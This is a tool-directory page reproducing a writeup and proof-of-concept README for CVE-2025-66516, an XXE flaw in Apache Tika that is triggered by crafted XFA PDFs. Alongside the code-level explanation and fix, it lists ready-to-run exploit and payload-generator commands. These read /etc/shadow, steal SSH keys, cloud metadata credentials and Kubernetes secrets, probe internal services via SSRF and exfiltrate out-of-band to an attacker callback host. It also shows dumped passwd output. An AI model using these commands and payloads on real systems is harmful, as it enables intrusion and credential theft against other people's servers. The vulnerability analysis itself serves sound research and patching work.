Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-66516-Writeup-POC — CVE-2025-66516 working exploit, scanner, explanation. | Kitploit
Tools/GitHubGitHub/chasingimpact/cve-2025-66516-writeup-poc
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration TestingLearning & EducationLabs & Practice

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
chasingimpact/cve-2025-66516-writeup-poc

CVE-2025-66516-Writeup-POC

CVE-2025-66516 working exploit, scanner, explanation.

View Repository
10249 months agoNot yet reviewed

CVE-2025-66516: Critical XXE Vulnerability in Apache Tika

image

Executive Summary

CVE-2025-66516 is a critical XML External Entity (XXE) injection vulnerability in Apache Tika with a CVSS score of 10.0 (maximum severity). The vulnerability allows remote attackers to read arbitrary files, perform Server-Side Request Forgery (SSRF), and exfiltrate sensitive data by uploading a specially crafted PDF document containing malicious XFA (XML Forms Architecture) content.

AttributeValue
CVE IDCVE-2025-66516
CVSS Score10.0 (Critical)
DisclosedDecember 4, 2025
VendorApache Software Foundation
Affected ProductApache Tika
Attack VectorNetwork (Remote)
AuthenticationNone Required

Affected Versions

ComponentVulnerable VersionsFixed Version
tika-core1.13 - 3.2.13.2.2+
tika-parser-pdf-module2.0.0 - 3.2.13.2.2+
tika-parsers1.13 - 1.28.52.0.0+

Important: This CVE supersedes CVE-2025-54988, which incorrectly identified only the PDF module as vulnerable. The actual vulnerability resides in tika-core.


Technical Analysis

The Vulnerability

The vulnerability is an XML External Entity (XXE) injection flaw in how Apache Tika processes XFA (XML Forms Architecture) data within PDF documents.

The Problem: Tika relies on underlying Java XML parsers (specifically a StAX parser) to read XFA XML content. Vulnerable versions failed to correctly configure the parser to disable external entity resolution. When the parser encounters an external entity request (like SYSTEM "file:///etc/passwd"), it resolves and returns the file contents.

Location: The bug exists in XMLReaderUtils.getXMLInputFactory() in tika-core:

public static XMLInputFactory getXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newFactory();
    tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
    tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
    factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER);  // <-- Ineffective
    return factory;
}

The IGNORING_STAX_ENTITY_RESOLVER was intended to block XXE by returning an empty result, but it returned a String instead of the expected InputStream. The JDK's default StAX parser silently ignored this incorrect return type and fell back to default behavior, which resolves external entities.

The Fix (Tika 3.2.2)

The fix explicitly disables DTD and external entity support at the factory level:

tryToSetStaxProperty(factory, XMLInputFactory.SUPPORT_DTD, false);
tryToSetStaxProperty(factory, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

Additionally, the resolver was changed to return a proper InputStream type.

The Incidental Woodstox Protection

In the Java ecosystem, multiple XML parser libraries exist. Applications use whichever parser is configured or found first on the classpath.

What is Woodstox? Woodstox is a high-performance, open-source StAX XML parser commonly bundled with Java applications.

How it provides protection: By design (not by accident), Woodstox's implementation correctly handles the XMLResolver return type. When Woodstox receives the string return value from IGNORING_STAX_ENTITY_RESOLVER, it treats it as valid empty content, effectively blocking the XXE.

Critical distinction:

  • tika-server-standard.jar bundles Woodstox - NOT VULNERABLE
  • tika-core + parser modules (embedded usage) does NOT bundle Woodstox - VULNERABLE
  • Applications using JDK's default StAX parser - VULNERABLE

Quick Start

Test the Vulnerability

# 1. Start the lab environment
docker-compose up -d --build

# 2. Test against vulnerable Tika (JDK StAX, port 9997)
python poc/exploit.py --url http://localhost:9997 --check

# 3. Extract /etc/passwd
python poc/exploit.py --url http://localhost:9997 --file /etc/passwd

# 4. Compare with protected Tika (Woodstox, port 9998)
python poc/exploit.py --url http://localhost:9998 --check

Lab Environment

Directory Structure

CVE-2025-66516/
|-- docker-compose.yml              # Lab orchestration
|-- vulnerable-tika/
|   |-- Dockerfile                  # Tika with Woodstox (protected)
|   +-- Dockerfile.jdk-stax         # Tika without Woodstox (VULNERABLE)
|-- webapp/
|   |-- Dockerfile
|   |-- app.py                      # Flask upload application
|   +-- templates/
|-- poc/
|   |-- exploit.py                  # Automated exploitation tool
|   +-- generate_payload.py         # Malicious PDF generator
+-- README.md

Services

ServicePortDescription
Web Application8080Document upload frontend
Tika (Woodstox)9998Protected - NOT vulnerable
Tika (JDK StAX)9997VULNERABLE - No Woodstox
Attacker Listener9999HTTP server for OOB testing

Starting the Lab

docker-compose up -d --build

Proof of Concept Tools

1. Automated Exploitation Tool (exploit.py)

Full-chain exploitation with automatic payload generation and data extraction.

# Check if target is vulnerable
python poc/exploit.py --url http://target:9998 --check

# Read local files
python poc/exploit.py --url http://target:9998 --file /etc/passwd
python poc/exploit.py --url http://target:9998 --file /etc/shadow

# AWS metadata theft (EC2 instances)
python poc/exploit.py --url http://target:9998 --aws-metadata

# Kubernetes secrets
python poc/exploit.py --url http://target:9998 --k8s-secrets

# SSRF to internal services
python poc/exploit.py --url http://target:9998 --ssrf http://internal:8080/admin

# Save extracted data
python poc/exploit.py --url http://target:9998 --file /etc/passwd --save loot.txt

2. Payload Generator (generate_payload.py)

Generates malicious PDF files for manual testing or integration with other tools.

# Generate payload for specific file
python poc/generate_payload.py --target /etc/passwd --output exploit.pdf

# Generate SSRF payload
python poc/generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf

# Generate OOB exfiltration payload
python poc/generate_payload.py --target /etc/passwd --callback http://attacker:8080 --output oob.pdf

# Use attack mode presets
python poc/generate_payload.py --mode aws_metadata --output aws.pdf
python poc/generate_payload.py --mode k8s_secrets --all-targets --output ./payloads/

# List available attack modes
python poc/generate_payload.py --list-modes

Available Attack Modes:

  • file_read - Read local files (/etc/passwd, /etc/shadow, etc.)
  • ssh_keys - Steal SSH private keys
  • aws_metadata - AWS EC2 metadata and IAM credentials
  • gcp_metadata - GCP service account tokens
  • azure_metadata - Azure managed identity tokens
  • k8s_secrets - Kubernetes service account credentials
  • webapp_configs - Common web application configs
  • ssrf_internal - Probe internal services

Testing Results

Vulnerable Configuration (JDK StAX - No Woodstox)

Testing against Tika 2.9.2 without Woodstox (simulating embedded deployments):

TestResult
XFA Detection[PASS] PDF recognized as having XFA
XFA Parsing[PASS] XFA content extracted
XXE File Read[VULNERABLE] /etc/passwd contents exfiltrated
XXE SSRF[VULNERABLE] External requests sent

Proof of Exploitation:

<li fieldName="data">data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Protected Configuration (Woodstox StAX)

Download Tool